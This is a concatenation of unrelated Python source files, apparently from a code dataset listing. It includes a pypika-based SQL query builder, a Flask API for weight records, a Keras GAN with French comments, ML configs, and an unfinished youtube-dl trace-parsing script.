save_file=args.save_param_filename
if save_file==None:
save_file="param_t"+str(n_train)+".dump"
save_CNN(save_file,cnn_params,mlp_params,lr_params)
#################
|
import itertools
from typing import Iterable
from fireant.utils import (
flatten,
format_dimension_key,
format_metric_key,
)
from pypika import (
Table,
functions as fn,
)
from .finders import (
find_and_group_references_for_dimensions,
find_joins_for_tables,
find_required_tables_to_join,
find_totals_dimensions,
)
from .reference_helper import adapt_for_reference_query
from .special_cases import apply_special_cases
from ..dimensions import (
Dimension,
TotalsDimension,
)
from ..filters import (
DimensionFilter,
Filter,
MetricFilter,
)
from ..joins import Join
from ..metrics import Metric
from ...database import Database
def adapt_for_totals_query(totals_dimension, dimensions, filters, apply_filter_to_totals):
"""
Adapt filters for totals query. This function will select filters for total dimensions depending on the
apply_filter_to_totals values for the filters. A total dimension with value None indicates the base query for
which all filters will be applied by default.
:param totals_dimension:
:param dimensions:
:param filters:
:param apply_filter_to_totals:
:return:
"""
assert len(filters) >= len(apply_filter_to_totals)
is_totals_query = totals_dimension is not None
# Get an index to split the dimensions before and after the totals dimension
index = dimensions.index(totals_dimension) \
if is_totals_query \
else len(dimensions)
grouped_dims, totaled_dims = dimensions[:index], dimensions[index:]
totals_dims = grouped_dims + [TotalsDimension(dimension)
for dimension in totaled_dims]
# remove all filters for total dimension that should not be applied to totals
# but add all filters for dimensions other than the total dimension
totals_filters = [f
for f, apply_to_totals in itertools.zip_longest(filters, apply_filter_to_totals, fillvalue=True)
if not is_totals_query
or apply_to_totals
and not isinstance(f, MetricFilter)]
return totals_dims, totals_filters
@apply_special_cases
def make_slicer_query_with_totals_and_references(database,
table,
joins,
dimensions,
metrics,
operations,
filters,
references,
orders,
apply_filter_to_totals=(),
share_dimensions=()):
"""
:param database:
:param table:
:param joins:
:param dimensions:
:param metrics:
:param operations:
:param filters:
:param references:
:param orders:
:param apply_filter_to_totals:
:param share_dimensions:
:return:
"""
"""
The following two loops will run over the spread of the two sets including a NULL value in each set:
- reference group (WoW, MoM, etc.)
- dimension with roll up/totals enabled (totals dimension)
This will result in at least one query where the reference group and totals dimension is NULL, which shall be
called base query. The base query will ALWAYS be present, even if there are zero reference groups or totals
dimensions.
For a concrete example, check the test case in :
```
fireant.tests.slicer.queries.test_build_dimensions.QueryBuilderDimensionTotalsTests
#test_build_query_with_totals_cat_dimension_with_references
```
"""
totals_dimensions = find_totals_dimensions(dimensions, share_dimensions)
totals_dimensions_and_none = [None] + totals_dimensions[::-1]
reference_groups = find_and_group_references_for_dimensions(references)
reference_groups_and_none = [(None, None)] + list(reference_groups.items())
queries = []
for totals_dimension in totals_dimensions_and_none:
(query_dimensions,
query_filters) = adapt_for_totals_query(totals_dimension,
dimensions,
filters,
apply_filter_to_totals)
for reference_parts, references in reference_groups_and_none:
(ref_database,
ref_dimensions,
ref_metrics,
ref_filters) = adapt_for_reference_query(reference_parts,
database,
query_dimensions,
metrics,
query_filters,
references)
query = make_slicer_query(ref_database,
table,
joins,
ref_dimensions,
ref_metrics,
ref_filters,
orders)
# Add these to the query instance so when the data frames are joined together, the correct references and
# totals can be applied when combining the separate result set from each query.
query._totals = totals_dimension
query._references = references
queries.append(query)
return queries
def make_slicer_query(database: Database,
base_table: Table,
joins: Iterable[Join] = (),
dimensions: Iterable[Dimension] = (),
metrics: Iterable[Metric] = (),
filters: Iterable[Filter] = (),
orders: Iterable = ()):
"""
Creates a pypika/SQL query from a list of slicer elements.
This is the base implementation shared by two implementations: the query to fetch data for a slicer request and
the query to fetch choices for dimensions.
This function only handles dimensions (select+group by) and filtering (where/having), which is everything needed
for the query to fetch choices for dimensions.
The slicer query extends this with metrics, references, and totals.
:param database:
:param base_table:
pypika.Table - The base table of the query, the one in the FROM clause
:param joins:
A collection of joins available in the slicer. This should include all slicer joins. Only joins required for
the query will be used.
:param dimensions:
A collection of dimensions to use in the query.
:param metrics:
A collection of metircs to use in the query.
:param filters:
A collection of filters to apply to the query.
:param orders:
A collection of orders as tuples of the metric/dimension to order by and the direction to order in.
:return:
"""
query = database.query_cls.from_(base_table)
elements = flatten([metrics, dimensions, filters])
# Add joins
join_tables_needed_for_query = find_required_tables_to_join(elements, base_table)
for join in find_joins_for_tables(joins, base_table, join_tables_needed_for_query):
query = query.join(join.table, how=join.join_type).on(join.criterion)
# Add dimensions
for dimension in dimensions:
terms = make_terms_for_dimension(dimension, database.trunc_date)
query = query.select(*terms)
# Don't group TotalsDimensions
if not isinstance(dimension, TotalsDimension):
query = query.groupby(*terms)
# Add filters
for filter_ in filters:
query = query.where(filter_.definition) \
if isinstance(filter_, DimensionFilter) \
else query.having(filter_.definition)
# Add metrics
terms = make_terms_for_metrics(metrics)
if terms:
query = query.select(*terms)
# Get the aliases for selected elements so missing ones can be included in the query if they are used for sorting
select_aliases = {el.alias for el in query._selects}
for (term, orientation) in orders:
query = query.orderby(term, order=orientation)
if term.alias not in select_aliases:
query = query.select(term)
return query
def make_latest_query(database: Database,
base_table: Table,
joins: Iterable[Join] = (),
dimensions: Iterable[Dimension] = ()):
query = database.query_cls.from_(base_table)
# Add joins
join_tables_needed_for_query = find_required_tables_to_join(dimensions, base_table)
for join in find_joins_for_tables(joins, base_table, join_tables_needed_for_query):
query = query.join(join.table, how=join.join_type).on(join.criterion)
for dimension in dimensions:
f_dimension_key = format_dimension_key(dimension.key)
query = query.select(fn.Max(dimension.definition).as_(f_dimension_key))
return query
def make_terms_for_metrics(metrics):
return [metric.definition.as_(format_metric_key(metric.key))
for metric in metrics]
def make_terms_for_dimension(dimension, window=None):
"""
Makes a list of pypika terms for a given slicer definition.
:param dimension:
A slicer dimension.
:param window:
A window function to apply to the dimension definition if it is a continuous dimension.
:return:
a list of terms required to select and group by in a SQL query given a slicer dimension. This list will contain
either one or two elements. A second element will be included if the dimension has a definition for its display
field.
"""
# Apply the window function to continuous dimensions only
dimension_definition = (
window(dimension.definition, dimension.interval)
if window and hasattr(dimension, 'interval')
else dimension.definition
).as_(format_dimension_key(dimension.key))
# Include the display definition if there is one
return [
dimension_definition,
dimension.display_definition.as_(format_dimension_key(dimension.display_key))
] if dimension.has_display_field else [
dimension_definition
]
def make_orders_for_dimensions(dimensions):
"""
Creates a list of ordering for a slicer query based on a list of dimensions. The dimensions's display definition is
used preferably as the ordering term but the definition is used for dimensions that do not have a display
definition.
:param dimensions:
:return:
a list of tuple pairs like (term, orientation) for ordering a SQL query where the first element is the term
to order by and the second is the orientation of the ordering, ASC or DESC.
"""
# Use the same function to make the definition terms to force it to be consistent.
# Always take the last element in order to prefer the display definition.
definitions = [make_terms_for_dimension(dimension)[-1]
for dimension in dimensions]
return [(definition, None)
for definition in definitions]
|
from .utils import clever_format
from .profile import profile, profile_origin
import torch
default_dtype = torch.float64 |
#
# Created on Thu Aug 24 2020
# Author: Vijendra Singh
# Licence: MIT
# Brief:
#
import os
import cv2
import parameters as params
def read_images(dir_name=params.DATA_DIR):
'''
@brief: read images and store it along with unique ID representing its position
@args[in]: directory containing images
@args[out]: list of images and its corresping assigned ID
'''
images = []
image_names = os.listdir(dir_name)
image_names.sort()
for image_name in image_names:
print(image_name, 'loaded')
image = cv2.imread(os.path.join(dir_name, image_name), 0)
width = image.shape[1]//params.DOWN_FACTOR
height = image.shape[0]//params.DOWN_FACTOR
image = cv2.resize(image, (width, height))
images.append(image)
if params.TEST_BOOL:
cv2.imshow(image_name, image)
cv2.moveWindow(image_name, 100, 50)
cv2.waitKey(0)
cv2.destroyWindow(image_name)
return images
|
from django.shortcuts import render
from .forms import StudentRegistration
# Create your views here.
def showformdata(request):
fm=StudentRegistration(auto_id='some_%s', label_suffix=' ?', initial={'name':'rishabh'})
return render(request,"enroll/userregistration.html",{'stud':fm})
|
class Task:
title = "Task"
done = False
def __init__(self, title):
self.title = title
def check(self):
self.done = not self.done |
# cff for L1GtAnalyzer module
#
# V.M. Ghete 2012-05-22
from L1Trigger.GlobalTriggerAnalyzer.l1GtAnalyzer_cfi import *
|
import os
obj_dir = "/home/pirate03/hobotrl_data/playground/initialD/exp/record_rule_scenes_rnd_obj_v3_fenkai_rm_stp/val"
eps_names = sorted(os.listdir(obj_dir))
for eps_name in eps_names:
eps_dir = obj_dir + "/" + eps_name
lines = open(eps_dir+"/0000.txt", "r").readlines()
new_txt = open(eps_dir+"/0001.txt", "w")
for i, line in enumerate(lines):
line.split(",")[0] = str(i+1)
new_txt.write(line)
new_txt.close() |
1
import rospy
import Talker
from std_msgs.msg import String
def speak_text_callback(data):
pass
def socialist():
rospy.init_node("socialist")
rospy.Subscriber("speak_text", String, speak_text_callback)
rospy.spin()
if __name__ == '__main__':
socialist()
|
_base_ = '../res2net/cascade_rcnn_r2_101_fpn_20e_coco.py'
model = dict(
backbone=dict(
type='CBRes2Net',
cb_del_stages=1,
cb_inplanes=[64, 256, 512, 1024, 2048],
dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, True, True, True)),
neck=dict(type='CBFPN'),
test_cfg=dict(rcnn=dict(score_thr=0.001, nms=dict(type='soft_nms'))))
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# augmentation strategy originates from HTC
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1600, 400), (1600, 1400)],
multiscale_mode='range',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1600, 1400),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
fp16 = dict(loss_scale=dict(init_scale=512))
|
import io, re, sys
import string
import pandas as pd
from toolz.functoolz import compose_left
from ast import literal_eval
from pathlib import Path
from types import SimpleNamespace
from typing import Dict, List, Tuple
from pdb import set_trace as st
from prettyprinter import pprint
from prettyprinter import cpprint
from dataclasses import dataclass
from collections import namedtuple
import importlib.util
spec = importlib.util.spec_from_file_location("parse_verbose_argvars", "/Users/alberthan/VSCodeProjects/vytd/src/youtube-dl/bin/fmtutil/row/parse_verbose_argvars.py")
parse_verbose_argvars = importlib.util.module_from_spec(spec)
spec.loader.exec_module(parse_verbose_argvars)
def old_process_call_datum(call_datum):
rgx1 = re.compile(r"^(?P<indent>\s*)(?P<function>=>\s[A-z0-9_]+)\((?P<argvars>.*)\)$")
m1 = rgx1.match(call_datum)
gd1 = m1.groupdict()
indent,function,argvars = gd1.values()
print(argvars,type(argvars))
# rgx2 = re.compile(r"{[^}]+,[^]]+}|(,)") # 562
# replacement = lambda m: "UniqStr" if m.group(1) else m.group(0)
# replaced = rgx2.sub(replacement, argvars)
# splitvars:List = replaced.split("UniqStr")
# print(f"{splitvars=}")
# print(f"{len(splitvars)=}")
# for s in splitvars:
# print(s)
# print('--++--'*80+'\n\n'+'-**-'*20)
# splitdct=dict([(elm.split('=',1)) for elm in splitvars]) # keys=info_dict,params
# splitvals = list(splitdct.values())
return splitvals
rgx3 = re.compile(r"(\'[^\']+)(\[\.{3}\])[^\']+,")
rplcmt = lambda m: r"\1[...]'" if m.group(1) else m.group(0)
spltvls = [rgx3.sub(r"\1[...]',",splitvals[0])for v in splitvals]
# re.sub(r"(\'[^\']+)(\[\.{3}\])[^\']+,",r"\1[...]',",splitvals[0])
# def pp(s) -> str:
# stream = io.StringIO()
# pprint(s,
# stream=stream,
# indent=2,
# width=220,
# # depth=_UNSET_SENTINEL, # default good
# compact=True, # noef?
# ribbon_width=220,
# max_seq_len=920, # noef?
# sort_dict_keys=True,
# end='\n' # the last line
# )
# return stream.getvalue()
# def cp(s) -> str:
# stream = io.StringIO()
# cpprint(s,
# stream=stream,
# indent=2,
# width=220,
# # depth=_UNSET_SENTINEL, # default good
# compact=True, # noef?
# ribbon_width=220,
# max_seq_len=920, # noef?
# sort_dict_keys=True,
# end='\n' # the last line
# )
# return stream.getvalue()
class FmtdCellData:
def __init__(self,funcname):
self.funcname = funcname
def colorize(self,s) -> str:
assert isinstance(s,str), s
_stream = io.StringIO()
try:
litval = literal_eval(s)
cpprint(litval,stream=_stream)
except:
cpprint(s,stream=_stream)
rv = _stream.getvalue()
_stream.close()
return rv
class FmtdCallData(FmtdCellData):
def __init__(self, funcname, keyslst, valslst):
super().__init__(funcname)
self.keyslst = keyslst
self.valslst = valslst
self.argnames = [k.strip().replace("'","") for k in self.keyslst]
self.argvalues = [v.strip().replace("'","") for v in self.valslst]
def get_fmtd_str(self,c=False):
"""..c:: (True|False|'All')"""
if not c or c == 'All':
d = {k:v for k,v in zip(self.argnames,self.argvalues)}
if c or c == 'All':
cz = self.colorize
cd = {cz(k):cz(v) for k,v in zip(self.argnames,self.argvalues)}
rv = (d,cd) if c == 'All' else d if not c else d
return rv
class FmtdVerboseCallData(FmtdCellData):
def __init__(self, funcname, keyslst, valslst):
super().__init__(funcname)
self.keyslst = keyslst
self.valslst = valslst
self.argnames = [k.strip().replace("'") for k in self.keyslst]
self.argvalues = [v.strip().replace("'") for v in self.valslst]
def get_fmtd_str(self,c=False):
"""..c:: (True|False|'All')"""
if not c or c == 'All':
d = {k:v for k,v in zip(self.argnames,self.argvalues)}
if c or c == 'All':
cz = self.colorize
cd = {cz(k):cz(v) for k,v in zip(self.argnames,self.argvalues)}
rv = (d,cd) if c == 'All' else d if not c else d
return rv
class FmtdReturnData(FmtdCellData):
def __init__(self, funcname, retvalslst):
super().__init__(funcname)
self.retvalslst = retvalslst
def get_fmtd_str(self,c=False):
"""..c:: (True|False|'All')"""
if not c or c == 'All':
t =(self.funcname, self.retvalslst)
if c or c == 'All':
cz = self.colorize
ct =(cz(self.funcname), cz(self.retvalslst))
rv = (t,ct) if c == 'All' else t if not c else ct
return rv
class FmtdExceptionData(FmtdCellData):
def __init__(self, funcname, retvalslst):
super().__init__(funcname)
self.retvalslst = retvalslst
def get_fmtd_str(self,c=False):
"""..c:: (True|False|'All')"""
if not c or c == 'All':
t =(self.funcname, self.retvalslst)
if c or c == 'All':
cz = self.colorize
ct =(cz(self.funcname), cz(self.retvalslst))
rv = (t,ct) if c == 'All' else t if not c else ct
return rv
def process_verbose_row(row):
print(1)
def process_verbose_args(indented_function,argvars):
keyslst,valslst = parsed = parse_argvars(argvars)
fmtd_cell_data = FmtdVerboseCellData(function,keyslst,valslst)
return fmtd_cell_data
def process_regular_args(indented_function,argvars):
parse_argvars_ez = lambda s: map(str.strip,s.split('='))
print(argvars)
keys,vals = parsed = parse_argvars_ez(argvars)
# print(indent,function,argvars)
keylst,vallst = [keys],colorize_string(vals,e=True) # keep consistent with verbose
fmtd_cell_data = FmtdCellData(f"{indent}{function}",keylst,vallst)
return fmtd_cell_data
def classify_whether_argvars_verbose(indented_function,argvars):
assert isinstance(argvars,str), argvars
if len(argvars[1]) > 2000:
return process_verbose_args(indented_function,argvars)
else:
return process_regular_args(indented_function,argvars)
def prep_clean_classify_format(call_datum):
# calrgx = re.compile(r"(?P<indented_function>^\s*=\>\s[<>A-z0-9_-]+)\((?P<argname>\.\d+)=(?P<argval><[^>]+>)\)$")
calrgx = re.compile(r"(?P<indented_function>^\s*=\>\s[<>A-z0-9_-]+)\((?P<argvars>.*?)\)$")
excrgx = re.compile(r"(?P<indented_function>^\s*\<=\s[<>A-z0-9_-]+):\s\[(?P<retvals>[^]]+)\]$")
retrgx = re.compile(r"(?P<indented_function>^\s*\s!\s[<>A-z0-9_-]+):\s\[(?P<retvals>[^]]+)\]$")
print(11)
if '=>' in call_datum:
print(22)
# call: '{COLOR}=>{NORMAL} {}({}{COLOR}{NORMAL}){RESET}\n'
m = calrgx.match(call_datum)
gd = m.groupdict()
indented_function,argvars = gd.values()
# print(f'{call_datum=}')
# print(f"{indented_function=}")
fmtd_cell_data = classify_whether_argvars_verbose(indented_function, argvars)
return fmtd_cell_data
# if m1 := calrgx1.match(call_datum):
# print('a')
# gd1 = m1.groupdict()
# indented_function,argvars = gd1.values()
# keyslst,valslst = [argname],[argval] # keep consistent with verbose
# fmtd_cell_data = FmtdCallData(indented_function,keyslst,valslst)
# return fmtd_cell_data
# print('b')
elif '<=' in call_datum:
print(33)
# return: '{COLOR}<={NORMAL} {}: {RESET}{}\n',
if m2 := excrgx.match(call_datum):
gd2 = m2.groupdict()
indented_function,retvals = gd2.values()
retvalslst = [retvals] # keep consistent with verbose
fmtd_cell_data = FmtdReturnData(indented_function,retvalslst)
return fmtd_cell_data
elif ' !' in call_datum:
print(44)
# exception: '{COLOR} !{NORMAL} {}: {RESET}{}\n',
if m3 := retrgx.match(call_datum):
gd3 = m3.groupdict()
indented_function,retvals = gd3.values()
retvalslst = [retvals] # keep consistent with verbose
fmtd_cell_data = FmtdExceptionData(indented_function,retvalslst)
return fmtd_cell_data
print(55)
return fmtd_cell_data
Index,filepath,line_number,symbol,event_kind,call_data,snoop_data = row
call_datum = call_data[0]
fmtd_data = prep_clean_classify_format(call_datum)
assert isinstance(call_data,list), type(call_data)
return fmtd_data
def initdf(initdf):
initdf.iloc[10:14,0].filepath = 'extractor/__init__.py'
initdf.iloc[14:16,:].filepath = 'downloader/__init__.py'
initdflst = list(initdf.itertuples())
idflm4 = initdflst[-4]
# print(idflm4)
return idflm4
def par(cd):
call_data = row.call_data
call_datum = call_data[0]
rgx=re.compile(r"^(?P<indented_filename>\s+=\>\s[A-z0-9-_]+)\((?P<argvars>.*)\)$")
m = rgx.match(call_datum)
gd = m.groupdict()
indented_filename, argvars = gd.values()
argvars2 = re.sub(r" <youtube_dl.utils.DateRange object at 0x111ed26a0>,",
r" '<youtube_dl.utils.DateRange object at 0x111ed26a0>', ",
argvars)
pargDvars = pargvars(argvars2)
argvars3 = parse_argvars(argvars2)
if __name__ == "__main__":
# dfpath = Path('/Users/alberthan/VSCodeProjects/vytd/src/youtube-dl/bin/tfdf/idf.pkl')
# idf = pd.read_pickle(dfpath)
# row = initdf(idf)
# call_data = row.call_data
kl,vl = parsed = par(call_datum)
print(f"{len(kl)=}");print(f"{len(vl)=}")
print(f"{kl=}")
print(f"{len(kl[0])=}");print(f"{len(vl[0])=}")
# print(parsed[0]) # ['', '>get_suitable_downloader']
# print(parsed[1][0]
# st()
# parsed = process_verbose_row(row)
# print(dir(parsed))
# print(parsed.funcname)
# print(parsed.fmtd_data)
# print(parsed.fmtd_datac)
# print(parsed.args_keys)
# info_dict, idval= parsed.get_arg('info_dict')
# params, parval= parsed.get_arg('params')
# print(idval)
# print(parval)
# info_dict, idval= parsed.get_arg('info_dict',color=True)
# params, parval= parsed.get_arg('params',color=True)
# print(idval)
# print(parval)
|
import sys
def error(msg):
"""Prints error message, sends it to stderr, and quites the program."""
sys.exit(msg)
args = sys.argv[1:] # sys.argv[0] is the name of the python script itself
try:
arg1 = int(args[0])
arg2 = args[1]
arg3 = args[2]
print("Everything okay!")
except ValueError:
error("First argument must be integer type!")
except IndexError:
error("Requires 3 arguments!") |
from flask import Flask,jsonify,request,render_template
from flask_cors import CORS
app = Flask(__name__, static_url_path='/assets')
CORS(app)
listBerat = [
{'tanggal':'2018-08-22', 'max':50, 'min':49},
{'tanggal':'2018-08-21', 'max':49, 'min':49},
{'tanggal':'2018-08-20', 'max':52, 'min':50},
{'tanggal':'2018-08-19', 'max':51, 'min':50},
{'tanggal':'2018-08-18', 'max':50, 'min':48}
]
# @app.route('/')
# def home():
# return render_template('index.html')
# @app.route('/update')
# def update():
# return render_template('update.html')
# @app.route('/detail')
# def detail():
# return render_template('detail.html')
#get /store
@app.route('/berat')
def get_list():
if len(listBerat) == 0 :
return jsonify({'tanggal':'0000-00-00', 'max':0, 'min':0})
return jsonify(listBerat)
#mengambil list data
@app.route('/berat/<string:tanggal>')
def get_berat(tanggal):
for berat in listBerat:
if berat['tanggal'] == tanggal:
return jsonify(berat)
return jsonify ({'message': 'data not found'})
#tambah/edit data
@app.route('/berat' , methods=['POST'])
def tambah_data():
request_data = request.get_json()
new_data = {
'tanggal':request_data['tanggal'],
'max':int(request_data['max']),
'min':int(request_data['min'])
}
for berat in listBerat:
if berat['tanggal'] == new_data['tanggal']:
berat.update(new_data)
return jsonify(new_data)
listBerat.append(new_data)
return jsonify(new_data)
#menghapus data
@app.route('/hapus', methods=['POST'])
def delete_data():
request_data = request.get_json()
tanggal = request_data['tanggal']
global listBerat
listBerat = list(filter(lambda x: x['tanggal'] != tanggal, listBerat))
return 'item deleted'
@app.route('/ratarata')
def ratarata():
if len(listBerat) == 0:
return jsonify({'max':0, 'min':0})
max = [l['max'] for l in listBerat]
min = [l['min'] for l in listBerat]
return jsonify({'max': sum(max)/len(max), 'min': sum(min)/len(min)})
app.run(host='0.0.0.0', port=5544)
|
import io
from keras.models import Model
from keras.layers import Dense, Input
from matplotlib import pyplot
import numpy as np
import tensorflow as tf
import time
def discriminator():
# Entrée à 2 valeurs
inp = Input(shape=(2,), name='input_sample')
x = inp
# Unique couche cachée Dense de 25 noeuds avec une fonction d'activation ReLU
# et une méthode d'initialisation des poids He
x = Dense(25, activation="relu", kernel_initializer="he_uniform", name="dense1")(x)
# Couche de sortie avec une fonction d'activation sigmoïde
last = Dense(1, activation="sigmoid", name="output")(x)
return Model(inputs=inp, outputs=last)
def generator(latent_dim):
# Entrée à "latent_dim" valeurs
inp = Input(shape=(latent_dim,), name='input_sample')
x = inp
# Ajout de la couche cachée de 15 noeuds avec une fonction d'activation ReLU
# et la méthode d'initialisation des poids He
x = Dense(15, activation="relu", kernel_initializer="he_uniform", name="dense1")(x)
# Ajout de la sortie avec la fonction d'activation linéaire
last = Dense(2, activation="linear", name="output")(x)
return Model(inputs=inp, outputs=last)
class GAN(object):
# Constructeur
def __init__(self, epochs, batch_size, latent_dim, d_learning_rate, g_learning_rate, logdir):
self.epochs = epochs
self.batch_size = batch_size
self.latent_dim = latent_dim
# Instanciation de l'optimiseur du discriminateur
self.d_optimizer = tf.keras.optimizers.Adam(learning_rate=d_learning_rate)
# Instanciation de l'optimiseur du générateur
self.g_optimizer = tf.keras.optimizers.Adam(learning_rate=g_learning_rate)
self.logdir = logdir
self.discriminator = discriminator()
self.generator = generator(latent_dim)
# Instanciation de la fonction de perte du discrinateur
self.loss_fn = tf.keras.losses.BinaryCrossentropy(from_logits=True)
# Mesures de performance
self.g_accuracy = tf.keras.metrics.BinaryAccuracy()
self.d_accuracy = tf.keras.metrics.BinaryAccuracy()
self.d_real_accuracy = tf.keras.metrics.BinaryAccuracy()
self.d_generated_accuracy = tf.keras.metrics.BinaryAccuracy()
def generator_loss(self, generated_output):
# Calcul de la perte du générateur à l'aide des faux échantillons
# ayant été classifiés comme "vrai" par le discriminateur
return self.loss_fn(tf.ones_like(generated_output), generated_output)
def discriminator_loss(self, real_output, generated_output):
# Calcul de la perte du discriminateur à l'aide des vrais échantillons
# ayant été classifiés comme "vrai" et des faux échantillons ayant
# été classifiés comme "faux"
real_loss = self.loss_fn(tf.ones_like(real_output), real_output)
generated_loss = self.loss_fn(tf.zeros_like(generated_output), generated_output)
total_loss = real_loss + generated_loss
return total_loss
def generator_accuracy(self, generated_output):
# Calcul de la performance du générateur à l'aide des faux échantillons
# ayant été classifiés comme "vrai" par le discriminateur
self.g_accuracy.reset_states()
return self.g_accuracy(tf.ones_like(generated_output), generated_output)
def discriminator_accuracy(self, real_output, generated_output):
# Calcul de la performance du discriminateur à l'aide des échantillons réels
# ayant été classifiés comme "vrai" et des faux échantillons générés par
# le générateur ayant été classifiés comme "faux"
self.d_accuracy.reset_states()
return self.d_accuracy(tf.concat([tf.ones_like(real_output), tf.zeros_like(generated_output)], 0),
tf.concat([real_output, generated_output], 0))
def discriminator_real_accuracy(self, real_output):
# Calcul de la performance du discriminateur à classifier
# les vrais échantillons à "vrai"
self.d_real_accuracy.reset_states()
return self.d_real_accuracy(tf.ones_like(real_output), real_output)
def discriminator_generated_accuracy(self, generated_output):
# Calcul de la performance du discriminateur à classifier
# les faux échantillons à "faux"
self.d_generated_accuracy.reset_states()
return self.d_generated_accuracy(tf.zeros_like(generated_output), generated_output)
def train_step(self, real_samples):
# Génére les points de l'espace latent
random_latent_vectors = tf.random.normal(shape=(self.batch_size, self.latent_dim))
with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
# Génère les faux échantillons
generated_samples = self.generator(random_latent_vectors)
# Classifie les vrais échantillons
real_output = self.discriminator(real_samples)
# Classifie les faux échantillons
generated_output = self.discriminator(generated_samples)
# Calcul la perte du générateur
gen_loss = self.generator_loss(generated_output)
# Calcul la perte du discriminateur
disc_loss = self.discriminator_loss(real_output, generated_output)
# Calcul des performances du générateur
gen_acc = self.generator_accuracy(generated_output)
# Calcul des performances du discriminateur
disc_acc = self.discriminator_accuracy(real_output, generated_output)
# Calcul des performances du discriminateur avec les vrais échantillons
disc_real_acc = self.discriminator_real_accuracy(real_output)
# Calcul des performances du discriminateur avec les faux échantillons
disc_gen_acc = self.discriminator_generated_accuracy(generated_output)
# Récupère les gradients des variables entraînables par rapport à la perte
gradients_of_generator = gen_tape.gradient(gen_loss,
self.generator.trainable_variables)
gradients_of_discriminator = disc_tape.gradient(disc_loss,
self.discriminator.trainable_variables)
# Effectue une étape de descente de gradient en mettant à jour la valeur
# des variables pour minimiser la perte
self.g_optimizer.apply_gradients(zip(gradients_of_generator,
self.generator.trainable_variables))
self.d_optimizer.apply_gradients(zip(gradients_of_discriminator,
self.discriminator.trainable_variables))
return gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc
def train(self, dataset):
file_writer = tf.summary.create_file_writer(self.logdir)
file_writer.set_as_default()
time_list = []
# Boucle sur les époques
for epoch in range(self.epochs):
start_time = time.time()
# Boucle sur les lots du jeu de données
for real_samples in dataset:
# Entraine le GAN à l'aide d'un lot de vrais échantillons
gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc = self.train_step(real_samples)
wall_time_sec = time.time() - start_time
time_list.append(wall_time_sec)
template = 'Epoch {}, Generator loss {}, Discriminator Loss {}, Generator accuracy {}, Discriminator accuracy {}, Discriminator real accuracy {}, Discriminator fake accuracy {}'
print (template.format(epoch, gen_loss, disc_loss, gen_acc, disc_acc, disc_real_acc, disc_gen_acc))
# Logue les différentes pertes
tf.summary.scalar('1. Generator loss', gen_loss, step=epoch)
tf.summary.scalar('2. Discriminator loss', disc_loss, step=epoch)
# Logue les différentes performances
tf.summary.scalar('3. Generator accuracy', gen_acc, step=epoch)
tf.summary.scalar('4. Discriminator accuracy', disc_acc, step=epoch)
tf.summary.scalar('5. Discriminator real accuracy', disc_real_acc, step=epoch)
tf.summary.scalar('6. Discriminator fake accuracy', disc_gen_acc, step=epoch)
# Toutes les 50 époques
if (epoch) % 49 == 0:
# Récupère 2 lots de vrais échantillons
real_samples = np.concatenate([x for x in dataset.take(2)], axis=0)
random_latent_vectors = tf.random.normal(shape=(100, self.latent_dim))
# Récupère 100 faux échantillons
generated_samples = np.array(self.generator(random_latent_vectors))
# Dessine le diagramme de dispersion
fig = pyplot.figure()
ax2 = pyplot.axes()
ax2.scatter(real_samples[:, 0], real_samples[:, 1], c="red")
ax2.scatter(generated_samples[:, 0], generated_samples[:, 1], c="blue")
tf.summary.image("Output generator", plot_to_image(fig), step=(epoch+1))
return time_list
def plot_to_image(figure):
# Sauvegarde le diagramme en mémoire au format PNG
buf = io.BytesIO()
pyplot.savefig(buf, format='png')
pyplot.close(figure)
buf.seek(0)
# Convertir le tampon PNG en image TF
image = tf.image.decode_png(buf.getvalue(), channels=4)
# Ajoute la dimension lots
image = tf.expand_dims(image, 0)
return image |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.